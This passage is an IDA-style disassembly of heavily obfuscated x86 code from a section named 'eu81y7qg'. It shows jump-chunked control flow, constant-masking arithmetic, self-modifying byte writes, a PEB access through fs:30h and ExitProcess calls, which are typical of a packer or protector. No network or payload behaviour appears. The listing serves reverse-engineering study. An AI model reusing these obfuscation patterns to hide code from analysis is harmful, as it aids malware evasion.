		dd 0A3C68100h, 0B6569971h, 0E9243487h, 1A13h, 34CEE900h
		dd 0E8000000h, 0FFFFE6B8h, 0C30000h, 348AE900h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B976:				; CODE XREF: sub_48DE75-311Aj
		jmp	nullsub_593
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		dd 19EEC100h, 0FFFA89E9h
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48B985	proc near		; CODE XREF: eu81y7qg:0048BBCBp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048C426 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	ebp, [esp-4+arg_0]
		mov	esi, ebp
		pop	ebp
		mov	esi, [esi]
		jmp	loc_48C426
sub_48B985	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		sub	esi, ebp
		jmp	loc_48DF18
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_48DC25
; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_567. PRESS KEYPAD	"+" TO EXPAND]
		align 4
; START	OF FUNCTION CHUNK FOR sub_48AB88

loc_48B9A8:				; CODE XREF: sub_48AB88+2518j
		jmp	loc_48AD69
; END OF FUNCTION CHUNK	FOR sub_48AB88
; ---------------------------------------------------------------------------

loc_48B9AD:				; CODE XREF: eu81y7qg:0048A1E2j
		push	esi
		call	loc_48E178
; ---------------------------------------------------------------------------
		db 0
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D58F

loc_48B9B5:				; CODE XREF: sub_48D58F+Bj
		jmp	loc_48BC85
; END OF FUNCTION CHUNK	FOR sub_48D58F
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DD69

loc_48B9BB:				; CODE XREF: sub_48DD69-2583j
		push	esi
		push	0D0DFACh
		pop	esi
		or	esi, 8D198F06h
		rol	esi, 0Eh
		jmp	loc_48B22C
; END OF FUNCTION CHUNK	FOR sub_48DD69
; ---------------------------------------------------------------------------
		dd 0AFBF5700h, 0E90048CEh, 0FFFFE4C3h, 0A5E36800h, 11E90048h
		dd 11h,	5BC1F700h, 0E90C5DD4h, 26B8h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E7D7

loc_48B9F6:				; CODE XREF: sub_48E7D7+15j
		add	ebx, 22677E18h
		push	ebx
		mov	ebx, offset loc_489F4F
		jmp	loc_48A1AE
; END OF FUNCTION CHUNK	FOR sub_48E7D7
; ---------------------------------------------------------------------------

loc_48BA07:				; CODE XREF: eu81y7qg:0048AEAAj
		mov	[edi], eax
		call	near ptr dword_489F78+1
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B559

loc_48BA0F:				; CODE XREF: sub_48B559:loc_48E86Aj
		cmp	al, 0A4h
		jnz	loc_489A58
		jmp	loc_48C3A4
; END OF FUNCTION CHUNK	FOR sub_48B559
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_557. PRESS KEYPAD	"+" TO EXPAND]
		dw 7CE9h
		dd 0FFFFF0h, 487DE23h, 7C65824h, 8B575F87h, 243C87F9h
; ---------------------------------------------------------------------------

loc_48BA34:				; CODE XREF: eu81y7qg:0048CA43j
		jmp	loc_48DFE3
; ---------------------------------------------------------------------------
		align 2

; =============== S U B	R O U T	I N E =======================================



sub_48BA3A	proc near		; DATA XREF: sub_48DE75+6FFo

; FUNCTION CHUNK AT 0048D077 SIZE 00000005 BYTES

		push	ebx
		push	78F11713h
		pop	ebx
		rol	ebx, 0Dh
		add	ebx, 23AF3C6Ah
		jmp	loc_48D077
sub_48BA3A	endp

; ---------------------------------------------------------------------------
		add	edx, ebx
		jmp	sub_48CFEF
; ---------------------------------------------------------------------------
		align 4
		dd 0F5EC685h, 0FFFF0684h, 864B68FFh, 5758A74Dh,	48BD0BBFh
		dd 28BE900h, 0
		dd 0F8B7E95Ah, 1C87FFFFh, 317E824h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BA82:				; CODE XREF: sub_48DE75+54Fj
		jg	loc_489868

loc_48BA88:				; CODE XREF: eu81y7qg:loc_48C783j
		jmp	nullsub_574
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 2

loc_48BA8E:				; CODE XREF: eu81y7qg:0048A2C1j
		push	esi
		mov	esi, offset byte_48C2BF
		jmp	loc_48B661
; ---------------------------------------------------------------------------
		align 2

loc_48BA9A:				; DATA XREF: eu81y7qg:0048CD34o
		pop	edi
		jmp	loc_48DFBC
; ---------------------------------------------------------------------------

loc_48BAA0:				; CODE XREF: eu81y7qg:loc_48E6C8j
		call	sub_48CF7E
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		db  9Fh	; Ÿ
		db 0FDh	; ý
		db 0FFh
		db 0FFh
		db    0
		db    0
		db 0E9h	; é
		db  41h	; A
		db  2Ch	; ,
		db    0
		db    0
		db 0C6h	; Æ
		db    6
		db 0C7h	; Ç
		db  5Eh	; ^
		db  57h	; W
		db  68h	; h
		db 0E9h	; é
		db 0B2h	; ²
		db  5Ah	; Z
		db    9
		db  5Fh	; _
		db  81h	; 
		db 0CFh	; Ï
		db 0D5h	; Õ
		db 0D4h	; Ô
		db  73h	; s
		db  4Ch	; L
		db 0E9h	; é
		db  1Ah
		db  20h
		db    0
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A315

loc_48BACA:				; CODE XREF: sub_48A315+215Bj
		mov	byte ptr [esi],	9Ch
		xchg	eax, [esp+0]
		mov	esi, eax
		pop	eax
		jmp	loc_48D9FE
; END OF FUNCTION CHUNK	FOR sub_48A315
; ---------------------------------------------------------------------------
		db 0C3h	; Ã

; =============== S U B	R O U T	I N E =======================================



sub_48BAD9	proc near		; CODE XREF: eu81y7qg:loc_48E997p

; FUNCTION CHUNK AT 0048CB31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D9B0 SIZE 00000011 BYTES

		call	sub_48B80F

loc_48BADE:				; CODE XREF: eu81y7qg:0048D0E2j
		mov	ecx, ebp
		pop	ebp
		or	ecx, 0F5DAFE02h
		xor	ecx, 6D2048C2h
		add	ecx, 6189F65Bh
		push	esi
		mov	esi, ecx
		jmp	loc_48CB31
sub_48BAD9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

locret_48BAFC:				; CODE XREF: eu81y7qg:0048C1C2j
		retn
; ---------------------------------------------------------------------------
		align 2

loc_48BAFE:				; CODE XREF: eu81y7qg:00489C6Fj
		adc	ebx, edx

; =============== S U B	R O U T	I N E =======================================



sub_48BB00	proc near		; CODE XREF: sub_48BD75:loc_48EA2Ap
		xchg	edi, [esp+0]
		pop	edi
		push	esi
		push	0C0C46531h
		pop	esi
		jmp	near ptr loc_48EA2F+1
sub_48BB00	endp

; ---------------------------------------------------------------------------
		dd 87241487h, 0D68B2434h, 0FC25E95Eh, 0DE68FFFFh, 0E90048CAh
		dd 2A02h
dword_48BB28	dd 4B5FC081h		; DATA XREF: sub_48B769+6o
		db 0CEh, 0EFh
word_48BB2E	dw 8Bh			; DATA XREF: eu81y7qg:00489C05o
dword_48BB30	dd 992C008Ah, 0FFFB21E9h, 0EA8100FFh, 9C4AA00Eh, 63E9D7F7h
					; DATA XREF: sub_48C515+1o
		dd 2Ch
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48BB49	proc near		; CODE XREF: sub_48C27A-1E27p
					; eu81y7qg:0048C459j

; FUNCTION CHUNK AT 0048A5A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C95A SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ecx
		mov	ecx, offset loc_48A395
		jmp	loc_48A5A7
sub_48BB49	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C067

loc_48BB5A:				; CODE XREF: sub_48C067+2Cj
		xchg	ecx, [esp+0]
		jmp	nullsub_555
; END OF FUNCTION CHUNK	FOR sub_48C067
; ---------------------------------------------------------------------------
		align 4
		dd 0CB5F056Eh, 8B510048h, 3057E9CAh, 8C0F0000h,	155Bh
		dd 0FFF09EE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BB7F:				; CODE XREF: sub_48DE75+4D7j
		sbb	esi, ebp

loc_48BB81:				; CODE XREF: sub_48A24C:loc_48C93Dp
		xchg	edx, [esp+0]
		pop	edx
		mov	eax, large fs:30h
		call	sub_489D89
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BB93:				; CODE XREF: sub_48DE75-2E9Aj
		jmp	loc_48C6E5
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 0F3810000h, 204B336Ah, 0E91EEEC1h, 0FFFFDBF6h, 0CC68100h
		dd 81DA52FEh, 0C20864F6h, 5EC603F2h, 0FFFF53E8h, 0C4C281FFh
		dd 0E9C4FEE5h, 0FFFFDCAFh
; ---------------------------------------------------------------------------

loc_48BBC8:				; CODE XREF: sub_48DE75:loc_48CB00p
		xchg	esi, [esp]
		call	sub_48B985
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E9EE

loc_48BBD1:				; CODE XREF: sub_48E9EE+18j
		jmp	loc_48E9B8
; END OF FUNCTION CHUNK	FOR sub_48E9EE
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BBD8:				; CODE XREF: sub_48DE75+187j
		jmp	loc_48E38E
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFDC77h, 0A5E90000h, 0FFFFF9h, 1855E8h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A0B7

loc_48BBF3:				; CODE XREF: sub_48A0B7+1j
		jmp	loc_48C536
; END OF FUNCTION CHUNK	FOR sub_48A0B7
; ---------------------------------------------------------------------------
		dd 880F0000h, 0FFFFE097h, 0FFDF25E8h ; CODE XREF: sub_48DE75+3DDj
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48B8B2

loc_48BC06:				; CODE XREF: sub_48B8B2+6j
		jmp	loc_48E885
; END OF FUNCTION CHUNK	FOR sub_48B8B2
; ---------------------------------------------------------------------------
		align 4
		dd 243C8700h, 0DEA7685Fh, 1C879A30h, 5BC38B24h,	635AE881h
		dd 0C0C1CCEDh, 0DAC2E917h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48BC2B:				; CODE XREF: eu81y7qg:0048B2D6j
		jg	loc_48D164
		xchg	ebx, [esp]
		pop	ebx
		push	0CC3C8BE6h
		xchg	ebp, [esp]
		mov	ebx, ebp
		pop	ebp
		sub	ebx, 65F9E98h
		jmp	loc_48BEC2
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48BC4D:				; DATA XREF: sub_48D2B3+7o
		push	0C055530Eh
		pop	ebx
		rol	ebx, 0Bh
		sub	ebx, 1BCB4F1h
		push	ebx
		mov	ebx, edi
		jmp	loc_489826
; ---------------------------------------------------------------------------
		dd 830F0000h, 1117h, 5E243487h,	0E757C681h, 6893BF7h, 0FFF317E8h
		dd 0E90000FFh, 1FC1h
		db 0
; ---------------------------------------------------------------------------

loc_48BC85:				; CODE XREF: sub_48D58F:loc_48B9B5j
		push	ebx
		call	sub_48BE6F
; ---------------------------------------------------------------------------
		db 0
		dd 5850F00h, 0E9000000h, 20E4h,	0E8240487h, 0A35h, 3AE90000h
		db 25h,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A315

loc_48BCA7:				; CODE XREF: sub_48A315+Bj
		rol	esi, 0Fh
		sub	esi, 0F8CA1A2Dh
		test	esi, 400h
		jmp	loc_48A64A
; END OF FUNCTION CHUNK	FOR sub_48A315
; ---------------------------------------------------------------------------
		and	esi, 6D05858h
		push	offset dword_48D254
		jmp	locret_48A655
; ---------------------------------------------------------------------------
		align 4
		dd 0DAE78D0Fh, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A315

loc_48BCD4:				; CODE XREF: sub_48A315+36F4j
		jmp	loc_48E42D
; END OF FUNCTION CHUNK	FOR sub_48A315
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0D24h, 87680000h, 9D307BF6h,	0FFDACCE9h, 0C38100FFh
		dd 0E6605793h, 2BE91987h, 0C3000004h, 9C07C600h, 12C0C15Fh
		dd 632CC081h, 0CE52E6D1h, 0E8680B68h, 0F8A4E966h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D1F9

loc_48BD17:				; CODE XREF: sub_48D1F9+12j
		mov	esi, offset dword_48D020
		jmp	loc_48CBA5
; END OF FUNCTION CHUNK	FOR sub_48D1F9
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BD22:				; CODE XREF: sub_48DE75-466Cj
					; sub_48DE75-4661j
		push	edi
		mov	edi, (offset loc_48D500+1)
		jmp	loc_48C58C
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
		dd 0C9B7E069h, 0AFCB815Bh, 0E83489D7h, 2856h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BD42:				; CODE XREF: eu81y7qg:0048B8D6j
		jmp	loc_48CFA6
; ---------------------------------------------------------------------------

loc_48BD47:				; CODE XREF: eu81y7qg:0048B1F5j
		jmp	near ptr dword_48A3F0+47h
; ---------------------------------------------------------------------------
		dd 1870000h, 87241487h,	0D08B2404h, 0CC800F58h,	52FFFFE1h
		dd 0FFE279E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48BD65:				; CODE XREF: eu81y7qg:0048DD13j
		mov	esi, eax
		xchg	esi, [esp]
		push	(offset	loc_48E668+1)
		jmp	near ptr loc_48BE50+1
; ---------------------------------------------------------------------------
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48BD75	proc near		; CODE XREF: sub_48A5B4:loc_48CDFCp

; FUNCTION CHUNK AT 0048A359 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048EA2A SIZE 00000010 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	0CB1EFD86h
		pop	eax
		and	eax, 9B4D606Eh
		add	eax, 6989A971h
		cmp	esi, eax
		pop	eax
		jmp	loc_48A359
sub_48BD75	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_48BD93:				; CODE XREF: eu81y7qg:0048E9E9j
		adc	edi, 0D3D6B880h
		xchg	ecx, [esp]
		pop	ecx
		call	ds:dword_45C0C0	; ExitProcess
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BDA3:				; CODE XREF: sub_48DE75-1547j
		jmp	loc_48A95B
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 0F6810000h, 0F263DFE6h, 48EB5D68h, 2DA1E900h, 0DF1B0000h
		dd 0A18EC3F7h, 9FE916C1h
		db 17h,	2 dup(0)
byte_48BDC7	db 0C6h			; DATA XREF: eu81y7qg:00489CCCo
		dd 2C879C06h, 5DF58B24h, 255FE8h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48BDD7:				; CODE XREF: eu81y7qg:0048CF0Bj
		mov	byte ptr [edi],	87h
		pop	edi
		push	offset loc_48D5A0
		jmp	loc_48D4EB
; ---------------------------------------------------------------------------

loc_48BDE5:				; CODE XREF: eu81y7qg:0048A59Cj
		jbe	loc_48D5A0
		adc	eax, 206A602Ah

; =============== S U B	R O U T	I N E =======================================



sub_48BDF1	proc near		; CODE XREF: eu81y7qg:loc_48A04Ap
		xchg	edx, [esp+0]
		pop	edx
		mov	byte ptr [eax],	0FFh
		push	offset byte_48DD4F
		jmp	nullsub_588
sub_48BDF1	endp

; ---------------------------------------------------------------------------
		align 4

loc_48BE04:				; CODE XREF: eu81y7qg:loc_48AA2Cj
		jnz	loc_48B699
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BE0B:				; CODE XREF: sub_48DE75+2CEj
		jmp	loc_48E10D
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48BE11:				; CODE XREF: eu81y7qg:0048AA3Aj
		jmp	locret_48D156
; ---------------------------------------------------------------------------
		dw 3300h
		dd 0E9F887F9h, 0FFFFF877h
		db 0
; ---------------------------------------------------------------------------

loc_48BE21:				; DATA XREF: eu81y7qg:0048B752o
		push	22085A24h
		xchg	esi, [esp]
		mov	edi, esi
		pop	esi
		xor	edi, 8C3E6929h
		cmp	edi, 0E2F31EBCh
		jmp	loc_48EA4F
; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_579. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	[ecx], esi
		jmp	sub_48AB88
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48BE47:				; CODE XREF: eu81y7qg:00489C0Aj
		mov	byte ptr [edi],	8Bh
		pop	edi
		call	loc_48E3FC

loc_48BE50:				; CODE XREF: eu81y7qg:0048BD6Fj
		add	cl, ch
		adc	[edx], cl
; ---------------------------------------------------------------------------
		dd 0
		dd 0FFDB1EE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BE5F:				; CODE XREF: eu81y7qg:0048C030j
					; sub_48DE75:loc_48E302j
		add	edi, 8A8A5DE0h
		cmp	ebx, edi
		pop	edi
		jmp	loc_48CB4F
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		xor	esi, ebp

; =============== S U B	R O U T	I N E =======================================



sub_48BE6F	proc near		; CODE XREF: eu81y7qg:0048BC86p

; FUNCTION CHUNK AT 004894E6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048C74B SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0048EB43 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	0A5D10BC9h
		xchg	edx, [esp+0]
		jmp	loc_48EB43
sub_48BE6F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 8701C600h, 242C8759h, 0C75DCD8Bh, 0F28B2414h, 0E9243487h
		dd 0FFFFEAA6h, 0F0E95100h, 0FFFFE2h, 9D02C600h,	0C0C1585Ah
		db 8
; ---------------------------------------------------------------------------

loc_48BEA9:				; CODE XREF: eu81y7qg:loc_48CB82j
		sub	eax, 2D6720A7h
		jmp	loc_48EEBD
; ---------------------------------------------------------------------------
		dd 6BE91987h, 0FFFFDFh,	28E9E8h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BEC2:				; CODE XREF: eu81y7qg:0048BC46j
		jmp	loc_48E682
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48BEC7:				; CODE XREF: sub_48CF7E-1AA4j
		jmp	loc_48B2DB
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BECE:				; CODE XREF: sub_48DE75:loc_48C58Cj
		call	loc_48E1CD
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
		dd 949E900h, 23000000h
		db 0C6h
; ---------------------------------------------------------------------------

loc_48BEDD:				; CODE XREF: eu81y7qg:0048A3AFp
		xchg	eax, [esp]
		call	near ptr dword_489668+63h
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48BEE6:				; CODE XREF: eu81y7qg:0048A4DDj
		jmp	near ptr dword_489CD8+0Eh
; ---------------------------------------------------------------------------
		align 4
		xchg	edx, [esp]
		pop	edx
		push	ebp
		mov	ebp, ebx
		jmp	loc_48DFDC
; ---------------------------------------------------------------------------
		dd 0E9590000h, 0FFFFE484h, 2A83870Fh, 99E90000h, 1Ch, 870B8700h
		dd 0C6582404h, 565E8B06h, 2073E9h, 0F000000h, 0FFEE2789h
		dd 4BCD81FFh
; ---------------------------------------------------------------------------

loc_48BF28:				; CODE XREF: eu81y7qg:loc_48BF28j
		loope	loc_48BF28
		pushf
; START	OF FUNCTION CHUNK FOR sub_48D9C3

loc_48BF2B:				; CODE XREF: sub_48D9C3:loc_48D8A9j
		rol	esi, 2
		xor	esi, 0F8A83F21h
		jnz	loc_48A5FA
		pop	eax
		jmp	loc_48CF9D
; END OF FUNCTION CHUNK	FOR sub_48D9C3
; ---------------------------------------------------------------------------
		dd 50680000h, 0E90048EBh, 4B8h ; CODE XREF: eu81y7qg:loc_48EC50j
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BF4E:				; CODE XREF: sub_48DE75:loc_4897DEj
		jge	loc_48B372
		jns	loc_489B60
		test	ebp, ecx
		jmp	loc_48B36B
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_573. PRESS KEYPAD	"+" TO EXPAND]
		align 4
; START	OF FUNCTION CHUNK FOR sub_48CAC2

loc_48BF64:				; CODE XREF: sub_48CAC2-91Cj
		jmp	loc_48CC2E
; END OF FUNCTION CHUNK	FOR sub_48CAC2
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C6h
; ---------------------------------------------------------------------------
		push	es
		add	ebx, [esi-7Fh]
		retn
; ---------------------------------------------------------------------------
		db 0Ah,	86h, 0
		dd 0FDEB8130h, 57A3D955h, 7F7FD368h, 0F7815F6Ah, 26801588h
		dd 1A45E9h, 8B0F0000h, 0FFFFD65Ah, 88CE9h, 87000000h, 0E39E910h
		dd 2B000000h, 0E60AE9EFh, 0F700FFFFh, 0F5C7E9D5h, 9D00FFFFh
		dd 0FFFA6BE9h, 870000FFh, 1C872404h, 5BC38B24h
; ---------------------------------------------------------------------------
		mov	byte ptr [ebx],	8Bh
; START	OF FUNCTION CHUNK FOR sub_48C27A

loc_48BFC7:				; CODE XREF: sub_48C27A-277j
		jmp	loc_48D7B7
; END OF FUNCTION CHUNK	FOR sub_48C27A
; ---------------------------------------------------------------------------
		dd 23108B00h, 1A9DE9E8h, 0C3000000h, 51E900C3h,	14h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48BFE1:				; CODE XREF: sub_48DE75:loc_48E508j
		push	0E616AA9Ah
		xchg	eax, [esp+4+var_4]
		mov	edi, eax
		pop	eax
		and	edi, 3D7CC5F4h
		sub	edi, 44D3D6D2h
		jmp	loc_48E4B1
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C27A

loc_48BFFD:				; CODE XREF: sub_48C27A-18EBj
		mov	byte ptr [edx],	0C1h
		pop	edx
		add	edx, eax
		jo	short loc_48BFC7
		add	esi, [ecx]
		retn	75E8h
; END OF FUNCTION CHUNK	FOR sub_48C27A
; ---------------------------------------------------------------------------
		dw 17h
		dd 0C30000h
		db 0
; ---------------------------------------------------------------------------

loc_48C011:				; CODE XREF: eu81y7qg:0048C789j
		test	eax, edx
		jmp	loc_48EAEA
; ---------------------------------------------------------------------------

loc_48C018:				; DATA XREF: eu81y7qg:0048EE66o
		mov	byte ptr [eax],	0C3h
		push	edi
		push	422416BFh
		pop	edi
		push	eax
		mov	eax, 48D631h
		jmp	loc_48E3F6
; ---------------------------------------------------------------------------
		align 2
		add	ecx, ebp
		jmp	loc_48BE5F
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C037:				; DATA XREF: sub_48EDBB+5o
		push	9BE44877h
		pop	eax
		sub	eax, 17267B8Dh
		push	edx
		mov	edx, ecx
		xchg	edx, [esp]
		jmp	loc_48EEA8
; ---------------------------------------------------------------------------
		db 0
byte_48C04F	db 50h			; DATA XREF: sub_48DE75:loc_48E5FDo
		dd 2AABE8h, 0E9000000h,	0FFFFE90Ch, 0FFDE88E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48AB88

loc_48C062:				; CODE XREF: sub_48AB88+Ej
		jmp	loc_48D09B
; END OF FUNCTION CHUNK	FOR sub_48AB88

; =============== S U B	R O U T	I N E =======================================



sub_48C067	proc near		; CODE XREF: eu81y7qg:0048D620p
					; eu81y7qg:0048D7D5j

; FUNCTION CHUNK AT 0048BB5A SIZE 00000008 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	4DE3E1F8h
		pop	ebx
		sub	ebx, 0CA0FEA45h
		call	sub_4897EC
		mov	byte ptr [ecx],	87h
		pop	ecx
		pop	ecx
		xor	ecx, 41846593h
		and	ecx, 467BF18Bh
		add	ecx, 0C03879E1h
		jmp	loc_48BB5A
sub_48C067	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0FF810000h, 0C47F074Fh, 0FFD564E9h, 680000FFh, 2205FAC8h
		dd 597BCB81h, 7AE942BEh, 0FFFFF6h
byte_48C0B8	db 90h			; DATA XREF: sub_48CF7E-72Do
		db 0E8h, 0BAh, 0E3h
		dd 0FFFFh
; ---------------------------------------------------------------------------

loc_48C0C0:				; CODE XREF: eu81y7qg:0048A669j
		push	ebx
		mov	ebx, ecx
		push	offset loc_48B10E
		jmp	locret_48CF12
; ---------------------------------------------------------------------------
		align 2
		not	ebp
		jmp	loc_48D0A6
; ---------------------------------------------------------------------------
		align 2

locret_48C0D6:				; CODE XREF: eu81y7qg:0048A189j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A895

loc_48C0D7:				; CODE XREF: sub_48A895:loc_489D04j
		jmp	nullsub_581
; END OF FUNCTION CHUNK	FOR sub_48A895
; ---------------------------------------------------------------------------
		dd 0C2F70000h, 5AB920BEh, 0FFE003E9h, 815A00FFh, 0E819EC2h
		dd 6FE281BBh, 81DF72F5h, 93234CEAh, 4C2815Fh, 87CD992Ch
		dd 13E92414h, 0FFFFF9h,	18C9C100h, 80E9CD87h
		db 7, 2	dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48C117	proc near		; CODE XREF: sub_48B559:loc_48DADCp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00489A53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489AB9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A4C8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048B4A1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048D072 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D2FD SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048D799 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048DE0D SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		jz	loc_489A53
		jmp	loc_48D072
sub_48C117	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_48C126	proc near		; CODE XREF: eu81y7qg:0048EC2Ap

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		add	esi, 473F38AEh
		xor	esi, [esi]
		xchg	esi, [esp-4+arg_0]
		call	ds:dword_45C0C0	; ExitProcess
		push	offset sub_48D900
		jmp	nullsub_615
sub_48C126	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
		dd offset loc_489A32
; ---------------------------------------------------------------------------
		jmp	locret_48ED08
; ---------------------------------------------------------------------------
		align 2

loc_48C152:				; DATA XREF: sub_48DE75+531o
		xchg	edi, [esp]
		jmp	loc_48EC83
; ---------------------------------------------------------------------------
		dw 6800h
; ---------------------------------------------------------------------------
		test	al, 0C6h
		mov	ch, 0DBh
		jz	short loc_48C17E
		and	al, 8Bh
		retn
; ---------------------------------------------------------------------------
		pop	ebx
		and	eax, 4B4F0F18h
		or	eax, 83DDB7D3h
		jmp	loc_48CDAB
; ---------------------------------------------------------------------------
		align 4
		dd 1A28E800h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C17E:				; CODE XREF: eu81y7qg:0048C160j
		add	bl, al
; ---------------------------------------------------------------------------
		dd 2CE90000h, 0FFFFE4h,	6EE58100h, 0E9E19A88h, 69Eh, 0E9CFD100h
		dd 0FFFFFD50h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CAC2

loc_48C19D:				; CODE XREF: sub_48CAC2:loc_489908j
		mov	ecx, ebp
		push	ecx
		push	6B659AA9h
		pop	ecx
		jmp	loc_48BF64
